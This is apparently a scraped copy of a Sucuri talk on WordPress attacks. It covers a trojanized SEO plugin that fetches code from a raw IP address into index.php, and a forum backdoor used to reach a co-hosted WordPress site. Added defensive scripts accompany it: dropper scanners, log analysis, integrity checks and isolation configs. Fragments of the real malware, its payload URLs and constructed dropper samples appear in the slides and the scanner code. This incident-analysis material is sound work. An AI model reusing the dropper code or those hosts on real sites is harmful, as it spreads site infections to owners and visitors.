WordPress Security
Learning From Website Hacks
This is me!
Sucuri Inc.
Website Security
o Incident Handling
o Log Analysis

Tony Perez, COO - Sucuri, Inc.

sucuri.net

@perezbox
Let’s Learn from Website Attacks
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.

Attack Scenarios
o The Art of Phishing
o Stealing Credit Cards

Scenario Uno (One)
The art of Phishing Naive Users
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?

Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au

Difference
o Pro Version?
o Legit Version?
Modified file: aioseop_class.php

Intent
o Redirection - porn or exploit kits
o Target: index.php
o Taking content from here:
$code_txt = 'http://91.239.15.61/o1.txt';
o Placing it in the files here:
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
How?
o Index.php payload:
o Using curl to pull content from here:
$url = 'http://91.239.15.61/java/google.php';

Payload
o Pulls content from:
http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
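The dropper pattern in this scenario (fetch content from a remote address, then write it into index.php) can be turned into a simple detection heuristic for plugin and theme code. What follows is an added example for defenders, not code from the deck or from Sucuri; the PHP snippets it scans are constructed for the demo, and the 203.0.113.10 address in them is a documentation placeholder rather than the indicator shown on the slides.

```python
# Added example (not from the deck or Sucuri): heuristic scan of plugin/theme
# PHP for the Scenario One dropper pattern: fetch remote content, then write it
# into index.php. Sample PHP below is constructed; 203.0.113.10 is a TEST-NET
# placeholder, not the indicator shown on the slides.
import os
import re
from typing import Dict, List

REMOTE_FETCH = re.compile(r"\b(curl_exec|curl_init|file_get_contents|fopen)\s*\(")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/")
WRITE_CALL = re.compile(r"\bfile_put_contents\s*\(")
INDEX_TARGET = re.compile(r"index\.php")


def indicators(source: str) -> List[str]:
    """Return the indicators present in one PHP source string."""
    hits = []
    if REMOTE_FETCH.search(source):
        hits.append("remote-fetch")
    if RAW_IP_URL.search(source):
        hits.append("raw-ip-url")
    if WRITE_CALL.search(source) and INDEX_TARGET.search(source):
        hits.append("writes-index.php")
    return hits


def is_suspicious(source: str) -> bool:
    """Only the combination is flagged: a write that names index.php together
    with a fetch primitive or a raw-IP URL. A fetch alone (common in legitimate
    plugins) or a mention of index.php alone is not enough."""
    hits = indicators(source)
    return "writes-index.php" in hits and ("remote-fetch" in hits or "raw-ip-url" in hits)


def scan_sources(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan {path: php_source}; return indicators for every flagged file."""
    return {p: indicators(s) for p, s in files.items() if is_suspicious(s)}


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Same scan over real .php files under a plugin or theme directory."""
    sources = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    sources[path] = fh.read()
    return scan_sources(sources)


# Constructed samples modelled on the slides' description.
TROJANED = """<?php
$code_txt = 'http://203.0.113.10/o1.txt';
$code = file_get_contents($code_txt);
$index_path = $path . '/index.php';
if (file_put_contents($index_path, $code)) { return true; }
"""
# Legitimate plugin: fetches an API and caches it, never touches index.php.
BENIGN_CACHE = """<?php
$resp = wp_remote_get('https://api.example.invalid/v1/data');
$cache_file = WP_CONTENT_DIR . '/cache/data.json';
file_put_contents($cache_file, wp_remote_retrieve_body($resp));
"""
# Theme helper: mentions index.php in a comment and reads a local file only.
THEME_HELPER = """<?php
// Main template is index.php; load the stylesheet header.
$css = file_get_contents(__DIR__ . '/style.css');
"""
SAMPLES = {
    "all-in-one-seo-pack/aioseop_class.php": TROJANED,
    "some-plugin/cache.php": BENIGN_CACHE,
    "some-theme/functions.php": THEME_HELPER,
}

if __name__ == "__main__":
    for path, hits in scan_sources(SAMPLES).items():
        print(f"{path}: {', '.join(hits)}")
```

Run scan_directory against wp-content/plugins after installing anything from outside the official repository; the heuristic is deliberately narrow (write-to-index.php plus a fetch) so that ordinary caching plugins do not produce noise, and it should be read as a triage aid, not a replacement for comparing the files against the repository copy.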
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
Scenario Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce
  o Quick setup of payment collection systems for goods
o Awesome, right?

Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophic
  o Blacklisting
  o Ban
o No more cash flow! No more Trust!
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same environment

vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common

Scenario
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server

Payload
Found here: /wp-admin/includes/list.php

How?
o It’s about the journey folks…

Scenario
o list.php?
o shop.txt?

That’s Interesting
/forum/ajax.php?edit=

vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.

Dump of Users

Attack Vector
o Access Control

Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
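For the isolation point, here is an added example (not the deck's code) of how to check the separation that would have contained the second scenario: two applications on one server should run as distinct accounts, and no file inside one docroot should be owned or writable by the neighbour's account. The audit works on (path, owner, group, mode) records; collect_entries gathers real ones from a live Unix host, while the records in the demo are constructed, including a dropped wp-admin/includes/list.php owned by the forum's account, which is exactly the trace cross-contamination leaves.

```python
# Added example (not from the deck): audit whether co-hosted applications are
# isolated from each other. Demo records are constructed; collect_entries()
# gathers real ones on a Unix host.
import os
import stat
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Entry:
    path: str
    owner: str   # user name
    group: str   # group name
    mode: int    # permission bits, e.g. 0o644


@dataclass(frozen=True)
class App:
    root: str    # docroot, e.g. /var/www/wordpress
    user: str    # account the app's PHP worker runs as
    group: str


def app_for(path: str, apps: Iterable[App]) -> Optional[App]:
    """Which app's docroot contains this path (None if outside all of them)."""
    for app in apps:
        if path == app.root or path.startswith(app.root.rstrip("/") + "/"):
            return app
    return None


def audit(entries: Iterable[Entry], apps: List[App]) -> List[str]:
    findings = []
    # 1. Shared service account: code execution in one app is code execution in the other.
    first_root = {}
    for app in apps:
        if app.user in first_root:
            findings.append(f"shared-user: {app.root} and {first_root[app.user]} both run as {app.user}")
        first_root.setdefault(app.user, app.root)
    # 2. Per-file: world-writable, or owned/writable by a neighbouring app's account.
    for e in entries:
        home = app_for(e.path, apps)
        if home is None:
            continue
        if e.mode & stat.S_IWOTH:
            findings.append(f"world-writable: {e.path}")
        for other in apps:
            if other is home or other.user == home.user:
                continue  # same app, or already reported as shared-user
            if e.owner == other.user and (e.mode & stat.S_IWUSR):
                findings.append(f"owned-by-neighbour: {e.path} is owned by {other.user} ({other.root})")
            elif e.group == other.group and (e.mode & stat.S_IWGRP):
                findings.append(f"group-writable-by-neighbour: {e.path} via group {other.group}")
    return findings


def collect_entries(root: str) -> List[Entry]:
    """Collect real records from a live Unix host (not used by the demo)."""
    import grp
    import pwd
    out = []
    for dirpath, dirs, names in os.walk(root):
        for name in dirs + names:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            out.append(Entry(full, pwd.getpwuid(st.st_uid).pw_name,
                             grp.getgrgid(st.st_gid).gr_name, stat.S_IMODE(st.st_mode)))
    return out


# Constructed layout for the second scenario: one server, two apps, separate accounts.
APPS = [App("/var/www/wordpress", "wpuser", "wpuser"),
        App("/var/www/forum", "vbuser", "vbuser")]

ENTRIES = [
    Entry("/var/www/wordpress/wp-config.php", "wpuser", "wpuser", 0o640),
    Entry("/var/www/wordpress/wp-content/uploads", "wpuser", "www-data", 0o777),
    Entry("/var/www/wordpress/wp-admin/includes/list.php", "vbuser", "vbuser", 0o644),
    Entry("/var/www/forum/ajax.php", "vbuser", "vbuser", 0o644),
]


def demo() -> List[str]:
    return audit(ENTRIES, APPS)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The shared-account check is the one that matters most on typical shared hosting, where every site runs as the same www-data user; once that is the case no file permission scheme keeps a compromised forum out of the WordPress docroot, and the only real fix is separate accounts (or separate hosts).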

What can you do?
Let’s get proactive!
Harsh Reality
None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips...

Two Important Vectors
o Access control
  o Within your control…
o Software vulnerabilities
  o Not so much…

Defense in Depth
• There is no single cure
• Layered Defenses
• Combination of tools and actions
– Combine: Protection and Detection

Access Control
o Google Authenticator – 2FA
  o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
  o http://wordpress.org/plugins/duo-wordpress/
o Login Security Solution – Policy / Enforcement
  o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
  o http://sucuri.net/signup
Software Vulnerabilities
o Trusted Sources
  o Start with the repo and established communities
  o If you’re not a developer this is going to be beyond your reach mostly
o Web Application Firewall (WAF) Plugins
  o Highly ineffective, evading and bypassing is easy
  o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!
  o Sucuri CloudProxy WAF
Auditing
• Know what is going on with your site
– Integrity Checks
– Logging in / Logging out
– Changes being made
• More important than half the hardening tips you read online today
• Options:
– WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
– Sucuri Premium Plugin http://wordpress.sucuri.net
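For the Integrity Checks bullet (and the earlier "trust but verify" lesson), here is an added example, not the deck's code and not the code of either plugin listed above, of a baseline-and-compare check over a WordPress tree: record a SHA-256 manifest while the site is known-good, then report files added, removed or modified since. Against the two scenarios in this deck it would surface both the edited aioseop_class.php and the dropped wp-admin/includes/list.php. The tree it builds in a temporary directory is constructed for the demo.

```python
# Added example (not from the deck): SHA-256 baseline of a WordPress tree and
# a diff against the current state. The demo tree is constructed in a temp dir.
import hashlib
import os
import tempfile
from typing import Dict, Set, Tuple


def sha256_file(path: str) -> str:
    """Hash one file in chunks so large uploads do not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every regular file under root (relative, '/'-separated) to its hash."""
    manifest = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Tuple[Set[str], Set[str], Set[str]]:
    """Return (added, removed, modified) relative paths."""
    added = set(current) - set(baseline)
    removed = set(baseline) - set(current)
    modified = {p for p in baseline.keys() & current.keys() if baseline[p] != current[p]}
    return added, removed, modified


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo() -> Tuple[Set[str], Set[str], Set[str]]:
    """Constructed scenario: baseline a clean tree, then apply the two changes the
    deck describes (plugin file edited, new file dropped under wp-admin/includes)."""
    plugin = "wp-content/plugins/all-in-one-seo-pack/aioseop_class.php"
    with tempfile.TemporaryDirectory() as root:
        _write(root, plugin, "<?php // clean plugin code\n")
        _write(root, "wp-admin/includes/admin.php", "<?php // core file\n")
        _write(root, "wp-config.php", "<?php // config\n")
        baseline = build_manifest(root)          # taken while the site is known-good

        _write(root, plugin, "<?php // clean plugin code\n// injected dropper\n")
        _write(root, "wp-admin/includes/list.php", "<?php // dropped backdoor\n")
        return compare(baseline, build_manifest(root))


if __name__ == "__main__":
    added, removed, modified = demo()
    print("added:", sorted(added))
    print("removed:", sorted(removed))
    print("modified:", sorted(modified))
```

Keep the baseline manifest off the web server: an attacker who can write into the docroot can rewrite a manifest stored beside it. Re-baseline only after an update you performed yourself, so that every unexplained entry in the diff is something to investigate.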

If all else fails…
o Be sure you have backups…
o VaultPress – WordPress Sites
o Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!

Tony Perez
@perezbox | @sucuri_security

tony@sucuri.net
#wordsesh


Inclusivity Essentials_ Creating Accessible Websites for Nonprofits .pdf
 
Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.ppt
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Raw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptxRaw materials used in Herbal Cosmetics.pptx
Raw materials used in Herbal Cosmetics.pptx
 
Keynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-designKeynote by Prof. Wurzer at Nordex about IP-design
Keynote by Prof. Wurzer at Nordex about IP-design
 
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
ENG 5 Q4 WEEk 1 DAY 1 Restate sentences heard in one’s own words. Use appropr...
 
Concurrency Control in Database Management system
Concurrency Control in Database Management systemConcurrency Control in Database Management system
Concurrency Control in Database Management system
 
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptxBarangay Council for the Protection of Children (BCPC) Orientation.pptx
Barangay Council for the Protection of Children (BCPC) Orientation.pptx
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17Difference Between Search & Browse Methods in Odoo 17
Difference Between Search & Browse Methods in Odoo 17
 
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptxECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
ECONOMIC CONTEXT - PAPER 1 Q3: NEWSPAPERS.pptx
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 
Activity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translationActivity 2-unit 2-update 2024. English translation
Activity 2-unit 2-update 2024. English translation
 
4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY -  GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY -  GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Active Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdfActive Learning Strategies (in short ALS).pdf
Active Learning Strategies (in short ALS).pdf
 
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
ENGLISH 7_Q4_LESSON 2_ Employing a Variety of Strategies for Effective Interp...
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
Incoming and Outgoing Shipments in 3 STEPS Using Odoo 17
 
Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17Field Attribute Index Feature in Odoo 17
Field Attribute Index Feature in Odoo 17
 

WordPress Security - Learning From Hacks

  • 2. This is me!
    Sucuri Inc. - Website Security
    o Incident Handling
    o Log Analysis
    Tony Perez, COO - Sucuri, Inc. | sucuri.net | @perezbox
  • 3. Let's Learn from Website Attacks
    Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
  • 4.
  • 5. Attack Scenarios
    o The Art of Phishing
    o Stealing Credit Cards
  • 6. Scenario Uno (One): The Art of Phishing Naive Users
  • 7. Attack of Opportunity
    o Holiday season / Holiday spirit
    o Did you say Free?
  • 8.
  • 9. Red Flag[s]
    <A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
    Red Alert: http://www.[infecteddomain].com.au
  • 10. Difference
    o Pro Version?
    o Legit Version?
    Modified file: aioseop_class.php
  • 11. Intent
    o Redirection - porn or exploit kits
    o Target: index.php
    o Taking content from here:
      $code_txt = 'http://91.239.15.61/o1.txt';
    o Placing it in the files here:
      $index_path = $path.'/index.php';
      if(file_put_contents($index_path, $code)){
  • 12. How?
    o index.php payload:
    o Using curl to pull content from here:
      $url = 'http://91.239.15.61/java/google.php';
  • 13. Payload
    o Pulls content from:
      http://91.239.15.61/google.js - Redirection to porn sites
      http://91.239.15.61/g.php - Exploit kits
  • 14. Lesson to Be Learned
    o Trust, but verify sources
    o This is not isolated to just plugins; it can happen to themes as well
    o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
    o The vulnerability was the website administrator…
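The dropper behaviour on slides 11-13 (a hard-coded raw-IP URL, a curl fetch of its contents, and file_put_contents() into index.php files) is concrete enough to turn into a static triage check you can run over any plugin or theme zip before it goes near a site. The following is an added example written for this page, not code from the talk or from Sucuri: the regexes are this editor's heuristics, and both PHP samples are constructed to mimic the snippets on the slides rather than the real modified aioseop_class.php.

```python
"""Static triage of a downloaded WordPress plugin or theme for the dropper
pattern shown in Scenario One: a hard-coded raw-IP URL, a remote fetch of
its contents, and file_put_contents() into index.php files.

Added example (not the presentation's or Sucuri's code). The regexes are
heuristics written for this page; the PHP samples are constructed to mimic
the snippets on the slides and are not the actual malware source.
"""
import re
from pathlib import Path

# Indicator 1: a URL whose host is a bare IPv4 address (slides 11-13 all use 91.239.15.61).
REMOTE_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}[^'\"\s]*")
# Indicator 2: PHP calls that pull remote content.
FETCH_CALL = re.compile(r"\b(curl_init|curl_exec|file_get_contents|fopen|fsockopen)\s*\(")
# Indicator 3: a literal index.php path plus a file write somewhere in the same file.
INDEX_LITERAL = re.compile(r"['\"]/?index\.php['\"]")
FILE_WRITE = re.compile(r"\b(file_put_contents|fwrite)\s*\(")


def scan_php_source(src: str) -> list:
    """Return (indicator, evidence) pairs found in one PHP source string."""
    findings = [("remote_ip_url", m.group(0)) for m in REMOTE_IP_URL.finditer(src)]
    fetch = FETCH_CALL.search(src)
    if fetch:
        findings.append(("remote_fetch", fetch.group(1)))
    write = FILE_WRITE.search(src)
    if write and INDEX_LITERAL.search(src):
        findings.append(("writes_index_php", write.group(1) + " with an index.php target"))
    return findings


def verdict(findings: list) -> str:
    kinds = {kind for kind, _ in findings}
    # All three together is the slide 11/12 behaviour: fetch from a raw IP, write into index.php.
    if {"remote_ip_url", "remote_fetch", "writes_index_php"} <= kinds:
        return "dropper"
    return "suspicious" if kinds else "clean"


def scan_tree(root) -> dict:
    """Scan every .php file under an unpacked plugin/theme directory."""
    root = Path(root)
    out = {}
    for p in root.rglob("*.php"):
        findings = scan_php_source(p.read_text(errors="replace"))
        out[p.relative_to(root).as_posix()] = (verdict(findings), findings)
    return out


# Constructed sample modelled on slides 11-12 (not the real aioseop_class.php modification).
TROJANIZED = r"""<?php
$code_txt = 'http://91.239.15.61/o1.txt';
$ch = curl_init($code_txt);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$code = curl_exec($ch);
foreach (glob(ABSPATH . '*', GLOB_ONLYDIR) as $path) {
    $index_path = $path.'/index.php';
    if(file_put_contents($index_path, $code)){ }
}
"""

# Constructed sample of ordinary plugin code: no remote fetch, no file write.
BENIGN = r"""<?php
$opts = get_option('aioseop_options');
echo esc_html($opts['title']);
"""

if __name__ == "__main__":
    for name, src in (("trojanized", TROJANIZED), ("benign", BENIGN)):
        print(name, verdict(scan_php_source(src)), scan_php_source(src))
```

Run scan_tree() over the unzipped download and treat any "dropper" verdict as a stop. These are plain-text heuristics: a dropper that hides the URL and the write in base64 or eval() will slip past them, so the check complements, rather than replaces, diffing the download against the copy in the wordpress.org repository.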
  • 15. Scenario Dos (Two): Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
  • 16. Got e-Commerce?
    o Business owners <3 e-commerce
    o CMS extensibility = WooCommerce
    o Quick setup of payment collection systems for goods
    o Awesome, right?
  • 17. Big Target
    o Credit Card = Cha-Ching
    o Used/shared/sold underground
    o Impact is catastrophic
      o Blacklisting
      o Ban
      o No more cash flow! No more trust!
  • 18. Cross-contamination
    Simple concept in which your website is attacked and infected by a neighboring site in the same environment.
  • 19. vBulletin
    o Popular CMS application for forums
    o WordPress + vBulletin configurations are common
  • 20. Scenario
    o WordPress: Main website | Blog | e-Commerce
    o vBulletin: Forum
    o 1 Server
  • 21. Payload
    Found here: /wp-admin/includes/list.php
  • 22. How?
    o It's about the journey, folks…
  • 23. Scenario
    o list.php?
    o shop.txt?
  • 24. That's Interesting
    /forum/ajax.php?edit=
  • 25. vBulletin Plugin
    o A backdoor shell was installed into vBulletin, giving the attacker the tools they needed to attack the WordPress installation.
  • 26. Dump of Users
  • 27. Attack Vector
    o Access Control
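Slides 21-25 reconstruct the "journey" from web server logs: the same client first talks to the backdoor hiding behind /forum/ajax.php?edit= and then drives the shell dropped at /wp-admin/includes/list.php. The script below is an added example of that log analysis, not Sucuri's tooling; the access-log lines are constructed (RFC 5737 test addresses, invented timestamps) and the two detection rules are this editor's. The rule for wp-admin/includes rests on a property of WordPress itself: files in that directory are library code that WordPress include()s and that a browser never needs to request directly, so a direct hit on a .php file there is anomalous regardless of its name.

```python
"""Reconstruct the cross-contamination journey of Scenario Two from
Apache/nginx combined-format access logs.

Added example, not Sucuri's code. SAMPLE_LOG is constructed; the two
indicators (an "edit=" parameter on the forum's ajax.php, and any direct
request to a .php file under wp-admin/includes/) are this editor's rules
derived from the slides.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)


def parse(line: str):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return req


def classify(req: dict):
    path, query = (req["path"].split("?", 1) + [""])[:2]
    # Library code under wp-admin/includes is only ever include()d by WordPress;
    # a direct request to a .php file there (list.php on slide 21) is a strong sign of a dropped shell.
    if path.startswith("/wp-admin/includes/") and path.endswith(".php"):
        return "direct_hit_wp_admin_includes"
    # vBulletin's ajax.php is legitimate; the "edit=" parameter is the marker seen on slide 24.
    if path.endswith("/forum/ajax.php") and re.search(r"(^|&)edit=", query):
        return "forum_ajax_edit"
    return None


def journeys(lines) -> dict:
    """Return {client_ip: [(ts, tag, method, path), ...]} for clients that hit the
    forum backdoor marker and then a file under wp-admin/includes, in that order."""
    per_ip = defaultdict(list)
    for line in lines:
        req = parse(line)
        if not req:
            continue
        tag = classify(req)
        if tag:
            per_ip[req["ip"]].append((req["ts"], tag, req["method"], req["path"]))
    flagged = {}
    for ip, events in per_ip.items():
        events.sort()
        tags = [t for _, t, _, _ in events]
        if "forum_ajax_edit" in tags and "direct_hit_wp_admin_includes" in tags:
            first_forum = next(ts for ts, t, _, _ in events if t == "forum_ajax_edit")
            first_wp = next(ts for ts, t, _, _ in events if t == "direct_hit_wp_admin_includes")
            if first_forum <= first_wp:  # forum first, WordPress second: the cross-contamination order
                flagged[ip] = events
    return flagged


# Constructed sample log: one attacker (203.0.113.7) and one ordinary forum user.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2013:02:14:03 +0000] "POST /forum/ajax.php?edit=1 HTTP/1.1" 200 512
203.0.113.7 - - [10/Dec/2013:02:14:09 +0000] "POST /forum/ajax.php?edit=1 HTTP/1.1" 200 311
203.0.113.7 - - [10/Dec/2013:02:15:41 +0000] "POST /wp-admin/includes/list.php HTTP/1.1" 200 4021
198.51.100.20 - - [10/Dec/2013:02:16:00 +0000] "GET /forum/ajax.php?do=getquotes HTTP/1.1" 200 120
198.51.100.20 - - [10/Dec/2013:02:16:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2811
""".splitlines()

if __name__ == "__main__":
    for ip, events in journeys(SAMPLE_LOG).items():
        print(ip)
        for ts, tag, method, path in events:
            print(f"  {ts:%Y-%m-%d %H:%M:%S} {tag:30} {method} {path}")
```

Feed it the combined logs of both vhosts (journeys(open("access.log"))) and the output is the attacker's timeline across the two applications. The ordering check matters: a client that only hits wp-admin/includes is still worth a look, but forum-then-WordPress from one address is the signature of a neighbour being used as the foothold.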
  • 28. Lessons to Be Learned
    o Attackers are smart. Surprise!!!
    o Cross-contamination is a real threat today!
    o We must be diligent across our whole stack!
    o Isolate applications if possible.
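"Isolate applications if possible" on a single server means, at minimum, that the forum's PHP must not be able to read or write the WordPress document root. The PHP-FPM pool configuration below is an added example of one way to do that, not a configuration from the talk or from Sucuri; the pool names, Unix users, socket paths and directory layout are assumptions for illustration, and the web server is assumed to run as www-data and to proxy each vhost to its own socket.

```ini
; /etc/php/fpm/pool.d/wordpress.conf  (paths and user names are assumptions)
[wordpress]
user = wp-site
group = wp-site
listen = /run/php-fpm/wordpress.sock
listen.owner = www-data
listen.group = www-data
listen.mode = 0660
; Confine file access to this site's tree and its own temp directory.
php_admin_value[open_basedir] = /var/www/wordpress:/tmp/wordpress
php_admin_value[sys_temp_dir] = /tmp/wordpress
php_admin_value[upload_tmp_dir] = /tmp/wordpress
php_admin_value[disable_functions] = exec,passthru,shell_exec,system,proc_open,popen

; /etc/php/fpm/pool.d/forum.conf
[forum]
user = forum-site
group = forum-site
listen = /run/php-fpm/forum.sock
listen.owner = www-data
listen.group = www-data
listen.mode = 0660
php_admin_value[open_basedir] = /var/www/forum:/tmp/forum
php_admin_value[sys_temp_dir] = /tmp/forum
php_admin_value[upload_tmp_dir] = /tmp/forum
php_admin_value[disable_functions] = exec,passthru,shell_exec,system,proc_open,popen
```

The pools only help if the filesystem agrees with them: each document root is owned by its pool user with mode 750 (or 2750) so that forum-site cannot traverse /var/www/wordpress at all, and neither user is www-data. With that in place, a shell planted through vBulletin runs as forum-site and cannot create /wp-admin/includes/list.php in the WordPress tree. open_basedir and disable_functions are defence in depth on top of the ownership split, not a substitute for it; check the forum's own requirements before disabling process-execution functions, and separate database users with per-application grants complete the picture.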
  • 29. What can you do? Let's get proactive!
  • 30. Harsh Reality
    None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips…
  • 31. Two Important Vectors
    o Access control
      o Within your control…
    o Software vulnerabilities
      o Not so much…
  • 32. Defense in Depth
    • There is no single cure
    • Layered defenses
    • Combination of tools and actions
      – Combine: Protection and Detection
  • 33. Access Control
    o Google Authenticator – 2FA
      http://wordpress.org/plugins/google-authenticator/
    o Duo Security – 2FA
      http://wordpress.org/plugins/duo-wordpress/
    o Login Security Solution – Policy / Enforcement
      http://wordpress.org/plugins/login-security-solution/
    o Sucuri CloudProxy / Detection / Remediation - Complete Website Security
      http://sucuri.net/signup
  • 34. Software Vulnerabilities
    o Trusted sources
      o Start with the repo and established communities
      o If you're not a developer, this is going to be mostly beyond your reach
    o Web Application Firewall (WAF) plugins
      o Highly ineffective; evading and bypassing them is easy
      o Can cause denial of service
    o SaaS-based Web Application Firewall (WAF) is more effective!
      o Sucuri CloudProxy WAF
  • 35. Auditing
    • Know what is going on with your site
      – Integrity checks
      – Logging in / logging out
      – Changes being made
    • More important than half the hardening tips you read online today
    • Options:
      – WP Security Audit Log http://wordpress.org/plugins/wp-security-audit-log/
      – Sucuri Premium Plugin http://wordpress.sucuri.net
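Both incidents in the talk would have shown up in the first item on slide 35, an integrity check: Scenario One modifies an existing plugin file (aioseop_class.php) and Scenario Two adds a file that should not exist (wp-admin/includes/list.php). The following baseline-and-diff script is an added example of that check, not the code of the Sucuri plugin or of WP Security Audit Log. demo() builds a small constructed document root in a temporary directory and replays both cases; for a real site you would run build_manifest() against the document root and keep the JSON baseline outside it.

```python
"""Baseline-and-diff file integrity check of the kind slide 35 lists under
auditing: hash every file once, store the manifest, re-hash later and
report what was added, removed or modified.

Added example, not the Sucuri plugin's or WP Security Audit Log's code.
demo() builds a tiny constructed document root and replays both cases from
the talk: a plugin file modified in place and a file dropped into
wp-admin/includes/.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
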